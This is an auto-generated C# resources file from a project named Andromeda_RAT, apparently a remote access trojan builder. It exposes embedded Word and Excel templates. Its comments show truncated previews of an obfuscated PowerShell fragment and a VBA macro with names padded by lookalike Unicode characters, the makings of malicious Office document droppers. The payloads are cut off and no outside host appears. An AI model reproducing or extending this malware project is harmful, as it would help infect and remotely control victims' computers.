//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace Andromeda_RAT.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Andromeda_RAT.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to if ($a.ProcessName -like &quot;rshUAyCrGBZTDAUyCnCJfyipxkyZwkxMJQCkOhTpJkswwJiyLAiGJsrnTysLMEwvrxfshGvyxsQvZyiTAMQkpUpyBBfETsAGhGni&quot;)
        ///{
        ///rwLirpAskykvvQhxswCvfOfkkZrGAsCOfrGTxnppfhhDkZZQZByAfvwJpsLJDOhyQsiMnrQCkEsyLkBDMJhfysCJwBxpUZByQpDUsxEJvpLAsvBLGyJCZwQGhJBwOkhnyUTpyJwyGMJCZsTyQECQEwDnpBJxvwiyZZyykGDBrsUZsyCTsLQUCGvrxUQiQUOfLAwMUMfshBBkxLDTEDpTQwpyBwssGyBBEZwwrCnDThJBkTpwZvTGBTfkQvETfwBAQMGwksQifvMAAsfLLpLLwpQnyAQUZZnrLUBLJOAiCBQQTEUGppDTOTpknJCUAZGZnvLTGxEpMAvrOMxrrDBpixxfByZMDrBwpUEiAEMGiETBiyOMvkrBvTDrETi [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string rump {
            get {
                return ResourceManager.GetString("rump", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] template {
            get {
                object obj = ResourceManager.GetObject("template", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] template_excel {
            get {
                object obj = ResourceManager.GetObject("template_excel", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] tiago {
            get {
                object obj = ResourceManager.GetObject("tiago", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to Public Sub ㊛㊜㊝㊞㊟㊠wndj𝘈𝘉𝘊𝘌𝘍𝘋𝘎𝘏𝘏㊛㊜㊝㊞㊟㊠wdwd()
        /// &apos;Z𝘈𝘉𝘊𝘌𝘍𝘋𝘎𝘏𝘏LOxUACZiUyv𝘈𝘉𝘊𝘌𝘍𝘋𝘎𝘏𝘏GGC𝘈𝘉𝘊𝘌𝘍𝘋𝘎𝘏𝘏ihLhrhwwnJ㊥㊔㊓㊤㊣㊒㊑㊢㊥㊔㊓㊤㊣㊒㊑㊢MiLMiQEEnZZLnnJEZkJOLkrCir㊥㊔㊓㊤㊣㊒㊑㊢EiLixDAOM𝘈𝘉𝘊𝘌𝘍𝘋𝘎𝘏𝘏BUGDZh𝘈𝘉𝘊𝘌𝘍𝘋𝘎𝘏𝘏vMkTMniiQQkirvkrJMxysMUGJk
        /// &apos;Z𝘈𝘉𝘊𝘌𝘍𝘋𝘎𝘏𝘏LOgv𝘈𝘉𝘊𝘌𝘍𝘋𝘎𝘏𝘏xUACZiUyv𝘈𝘉𝘊𝘌𝘍𝘋𝘎𝘏𝘏GGC𝘈𝘉𝘊𝘌𝘍𝘋𝘎𝘏𝘏ihLhrhwwnJ㊥㊔㊓㊤㊣㊒㊑㊢㊥㊔㊓㊤㊣㊒㊑㊢MiLMiQEEnZZLnnJEZkJOLkrCir㊥㊔㊓㊤㊣㊒㊑㊢EiLixDAOM𝘈𝘉𝘊𝘌𝘍𝘋𝘎𝘏𝘏BUGDZh𝘈𝘉𝘊𝘌𝘍𝘋𝘎𝘏𝘏vMkTMniiQQkirvkrJMxysMUGJk
        /// &apos;GOssUAsGxy㊥㊔㊓㊤㊣㊒㊑ [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string word {
            get {
                return ResourceManager.GetString("word", resourceCulture);
            }
        }
    }
}
